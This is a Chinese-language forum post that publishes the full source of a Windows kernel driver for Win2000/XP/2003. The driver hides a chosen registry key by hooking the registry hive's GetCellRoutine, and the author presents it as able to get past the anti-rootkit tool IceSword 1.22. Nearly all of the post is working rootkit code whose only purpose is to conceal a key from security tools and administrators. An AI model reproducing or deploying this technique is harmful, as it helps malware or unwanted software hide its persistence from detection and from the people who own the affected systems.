发一段隐藏注册表项的驱动代码，可以过目前最新的IceSword1.22

以前驱动开发网悬赏挑战IceSword时写的，不过最后没公开。那时流氓软件势头正劲，我可不想火上浇油。现在反流氓软件日渐成熟，也就没关系了。知道了原理，防御是非常容易的。

原理很简单，实现的代码也很短，啥都不用说，各位直接看示例代码吧。

1. #include <ntddk.h>
3. #define GET_PTR(ptr, offset) ( *(PVOID*)( (ULONG)ptr + (offset##Offset) ) )
5. #define CM_KEY_INDEX_ROOT 0x6972 // ir
6. #define CM_KEY_INDEX_LEAF 0x696c // il
7. #define CM_KEY_FAST_LEAF 0x666c // fl
8. #define CM_KEY_HASH_LEAF 0x686c // hl
10. // 一些CM的数据结构，只列出用到的开头部分
11. #pragma pack(1)
12. typedef struct _CM_KEY_NODE {
13. USHORT Signature;
14. USHORT Flags;
15. LARGE_INTEGER LastWriteTime;
16. ULONG Spare; // used to be TitleIndex
17. HANDLE Parent;
18. ULONG SubKeyCounts[2]; // Stable and Volatile
19. HANDLE SubKeyLists[2]; // Stable and Volatile
20. // ...
21. } CM_KEY_NODE, *PCM_KEY_NODE;
23. typedef struct _CM_KEY_INDEX {
24. USHORT Signature;
25. USHORT Count;
26. HANDLE List[1];
27. } CM_KEY_INDEX, *PCM_KEY_INDEX;
29. typedef struct _CM_KEY_BODY {
30. ULONG Type; // "ky02"
31. PVOID KeyControlBlock;
32. PVOID NotifyBlock;
33. PEPROCESS Process; // the owner process
34. LIST_ENTRY KeyBodyList; // key_nodes using the same kcb
35. } CM_KEY_BODY, *PCM_KEY_BODY;
37. typedef PVOID (__stdcall *PGET_CELL_ROUTINE)(PVOID, HANDLE);
39. typedef struct _HHIVE {
40. ULONG Signature;
41. PGET_CELL_ROUTINE GetCellRoutine;
42. // ...
43. } HHIVE, *PHHIVE;
44. #pragma pack()
46. // 需隐藏的主键名
47. WCHAR g_HideKeyName[] = L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\Beep";
49. PGET_CELL_ROUTINE g_pGetCellRoutine = NULL;
50. PGET_CELL_ROUTINE* g_ppGetCellRoutine = NULL;
52. PCM_KEY_NODE g_HideNode = NULL;
53. PCM_KEY_NODE g_LastNode = NULL;
55. // 打开指定名字的Key
56. HANDLE OpenKeyByName(PCWSTR pwcsKeyName)
57. {
58. NTSTATUS status;
59. UNICODE_STRING uKeyName;
60. OBJECT_ATTRIBUTES oa;
61. HANDLE hKey;
63. RtlInitUnicodeString(&uKeyName, pwcsKeyName);
64. InitializeObjectAttributes(&oa, &uKeyName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
65. status = ZwOpenKey(&hKey, KEY_READ, &oa);
66. if (!NT_SUCCESS(status))
67. {
68. DbgPrint("ZwOpenKey Failed: %lx\n", status);
69. return NULL;
70. }
72. return hKey;
73. }
75. // 获取指定Key句柄的KeyControlBlock
76. PVOID GetKeyControlBlock(HANDLE hKey)
77. {
78. NTSTATUS status;
79. PCM_KEY_BODY KeyBody;
80. PVOID KCB;
82. if (hKey == NULL) return NULL;
84. // 由Key句柄获取对象体
85. status = ObReferenceObjectByHandle(hKey, KEY_READ, NULL, KernelMode, &KeyBody, NULL);
86. if (!NT_SUCCESS(status))
87. {
88. DbgPrint("ObReferenceObjectByHandle Failed: %lx\n", status);
89. return NULL;
90. }
92. // 对象体中含有KeyControlBlock
93. KCB = KeyBody->KeyControlBlock;
94. DbgPrint("KeyControlBlock = %lx\n", KCB);
96. ObDereferenceObject(KeyBody);
98. return KCB;
99. }
101. // 获取父键的最后一个子键的节点
102. PVOID GetLastKeyNode(PVOID Hive, PCM_KEY_NODE Node)
103. {
104. // 获取父键的节点
105. PCM_KEY_NODE ParentNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, Node->Parent);
106. // 获取子键的索引
107. PCM_KEY_INDEX Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, ParentNode->SubKeyLists[0]);
109. DbgPrint("ParentNode = %lx\nIndex = %lx\n", ParentNode, Index);
111. // 如果为根(二级)索引，获取最后一个索引
112. if (Index->Signature == CM_KEY_INDEX_ROOT)
113. {
114. Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, Index->List[Index->Count-1]);
115. DbgPrint("Index = %lx\n", Index);
116. }
118. if (Index->Signature == CM_KEY_FAST_LEAF || Index->Signature == CM_KEY_HASH_LEAF)
119. {
120. // 快速叶索引(2k)或散列叶索引(XP/2k3)，返回最后的节点
121. return g_pGetCellRoutine(Hive, Index->List[2*(Index->Count-1)]);
122. }
123. else
124. {
125. // 一般叶索引，返回最后的节点
126. return g_pGetCellRoutine(Hive, Index->List[Index->Count-1]);
127. }
128. }
130. // GetCell例程的钩子函数
131. PVOID MyGetCellRoutine(PVOID Hive, HANDLE Cell)
132. {
133. // 调用原函数
134. PVOID pRet = g_pGetCellRoutine(Hive, Cell);
135. if (pRet)
136. {
137. // 返回的是需要隐藏的节点
138. if (pRet == g_HideNode)
139. {
140. DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet);
141. // 查询、保存并返回其父键的最后一个子键的节点
142. pRet = g_LastNode = (PCM_KEY_NODE)GetLastKeyNode(Hive, g_HideNode);
143. DbgPrint("g_LastNode = %lx\n", g_LastNode);
144. // 隐藏的正是最后一个节点，返回空值
145. if (pRet == g_HideNode) pRet = NULL;
146. }
147. // 返回的是先前保存的最后一个节点
148. else if (pRet == g_LastNode)
149. {
150. DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet);
151. // 清空保存值，并返回空值
152. pRet = g_LastNode = NULL;
153. }
154. }
155. return pRet;
156. }
158. NTSTATUS DriverUnload(PDRIVER_OBJECT pDrvObj)
159. {
160. DbgPrint("DriverUnload()\n");
161. // 解除挂钩
162. if (g_ppGetCellRoutine) *g_ppGetCellRoutine = g_pGetCellRoutine;
163. return STATUS_SUCCESS;
164. }
166. NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath)
167. {
168. ULONG BuildNumber;
169. ULONG KeyHiveOffset; // KeyControlBlock->KeyHive
170. ULONG KeyCellOffset; // KeyControlBlock->KeyCell
171. HANDLE hKey;
172. PVOID KCB, Hive;
174. DbgPrint("DriverEntry()\n");
176. pDrvObj->DriverUnload = DriverUnload;
178. // 查询BuildNumber
179. if (PsGetVersion(NULL, NULL, &BuildNumber, NULL)) return STATUS_NOT_SUPPORTED;
180. DbgPrint("BuildNumber = %d\n", BuildNumber);
182. // KeyControlBlock结构各版本略有不同
183. // Cell的值一般小于0x80000000，而Hive正相反，以此来判断也可以
184. switch (BuildNumber)
185. {
186. case 2195: // Win2000
187. KeyHiveOffset = 0xc;
188. KeyCellOffset = 0x10;
189. break;
190. case 2600: // WinXP
191. case 3790: // Win2003
192. KeyHiveOffset = 0x10;
193. KeyCellOffset = 0x14;
194. break;
195. default:
196. return STATUS_NOT_SUPPORTED;
197. }
199. // 打开需隐藏的键
200. hKey = OpenKeyByName(g_HideKeyName);
201. // 获取该键的KeyControlBlock
202. KCB = GetKeyControlBlock(hKey);
203. if (KCB)
204. {
205. // 由KCB得到Hive
206. PHHIVE Hive = (PHHIVE)GET_PTR(KCB, KeyHive);
207. // GetCellRoutine在KCB中，保存原地址
208. g_ppGetCellRoutine = &Hive->GetCellRoutine;
209. g_pGetCellRoutine = Hive->GetCellRoutine;
210. DbgPrint("GetCellRoutine = %lx\n", g_pGetCellRoutine);
211. // 获取需隐藏的节点并保存
212. g_HideNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, GET_PTR(KCB, KeyCell));
213. // 挂钩GetCell例程
214. Hive->GetCellRoutine = MyGetCellRoutine;
215. }
216. ZwClose(hKey);
218. return STATUS_SUCCESS;
219. }